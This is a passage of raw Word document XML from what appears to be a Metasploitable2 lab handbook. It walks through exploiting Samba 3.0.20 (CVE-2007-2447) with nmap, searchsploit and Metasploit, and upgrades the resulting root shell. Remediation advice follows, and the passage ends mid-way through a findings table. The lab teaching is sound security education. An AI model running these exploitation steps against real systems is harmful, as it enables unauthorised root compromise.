        </w:rPr>
        <w:t xml:space="preserve">1. Service Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SMB (Server Message Block), also referred to as CIFS in some contexts, is a network file-sharing protocol primarily used by Windows systems for file, printer, and named-pipe sharing, typically running on TCP ports 445 and 139. Metasploitable2 runs a vulnerable Samba 3.0.20 build that is susceptible to a critical unauthenticated remote code execution vulnerability in its “username map script” functionality.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Technical Background</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Samba “username map script” option, when combined with insufficient input sanitization of the supplied username during the SMB authentication exchange, allows an attacker to inject and execute arbitrary shell commands on the host as root. This vulnerability, publicly cataloged as CVE-2007-2447, is one of the most iconic Metasploitable2 exercises because it demonstrates a full, one-step unauthenticated compromise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Scan the target to enumerate open ports and confirm the presence of SMB services.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nmap -sV -O -T4 -sS 192.168.228.130 192.168.228.254</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Launch Metasploit and use the smb_version auxiliary module to positively confirm the running Samba version.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p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">search smb_version</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">use 0</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">show options</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">set rhosts 192.168.228.130</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In a new terminal, cross-reference the confirmed Samba version against known Exploit-DB entries.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searchsploit Samba 3.0.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Exploitation Procedure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Re-launch (or reuse) Metasploit and search for the Samba 3.0.20 exploit module.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msfconsole</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">search Samba 3.0.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Select the matching exploit module and review its options.</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use 0</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">show options</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Set the target host.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set rhosts 192.168.228.130</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Launch the exploit.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exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Post-Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Once a shell session is returned, upgrade it to a fully interactive TTY using the standard Python PTY one-liner.</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B1B1B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">python -c 'import pty;pty.spawn("/bin/bash")'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirm root-level access has been achieved (uid=0) as final validation of full compromise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Command Reference Summary</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5600"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Purpose</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smb_version / use 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Locate and run the SMB version-detection auxiliary module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searchsploit Samba 3.0.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Cross-reference the confirmed version against public exploits</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search Samba 3.0.20 / use 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Locate and select the matching Metasploit exploit module</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">set rhosts &lt;ip&gt; / exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Configure the target and launch the exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">python -c 'import pty;pty.spawn("/bin/bash")'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Upgrade the returned shell to a full interactive TTY</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation &amp; Hardening Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrade Samba to a current, patched release; CVE-2007-2447 was fixed in Samba versions released after May 2007.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable the “username map script” option unless it is explicitly required, and if required, ensure strict input validation is enforced.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Restrict SMB service exposure (ports 139/445) to trusted internal networks only, and block it entirely at the network perimeter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Apply the principle of least privilege to the Samba service account so that even a successful compromise has a reduced blast radius.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Maintain a regular patch management cadence and subscribe to vendor security advisories for all file-sharing services.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Learning Outcomes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">How a single unsanitized input field (username) in an authentication exchange can lead to complete unauthenticated remote code execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The value of explicitly confirming service versions (via smb_version) before selecting an exploit, to avoid failed or unstable exploitation attempts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Why SMB, despite being a mature protocol, has repeatedly been the source of some of the most critical vulnerabilities in enterprise environments (e.g., EternalBlue).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId25"/>
          <w:footerReference w:type="default" r:id="rId26"/>
          <w:pgSz w:w="12240" w:h="15840" w:orient="portrait"/>
          <w:pgMar w:top="1350" w:right="1350" w:bottom="1350" w:left="1350" w:header="708" w:footer="708" w:gutter="0"/>
          <w:pgNumType/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Summary &amp; Consolidated Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Across all eight modules in this handbook, root-level or fully interactive access to Metasploitable2 was achieved through a consistent, repeatable methodology: host discovery, service enumeration, exploit or credential research, module configuration, exploitation, and shell stabilization. The table below consolidates the outcome of each module for quick reference.</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2600"/>
        <w:gridCol w:w="2200"/>
        <w:gridCol w:w="2200"/>
        <w:gridCol w:w="2800"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Service (Port)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Outcome</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Core Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">FTP (21)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Backdoored binary (supply chain)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Root shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Patch/verify package integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">SSH (22)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Weak credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
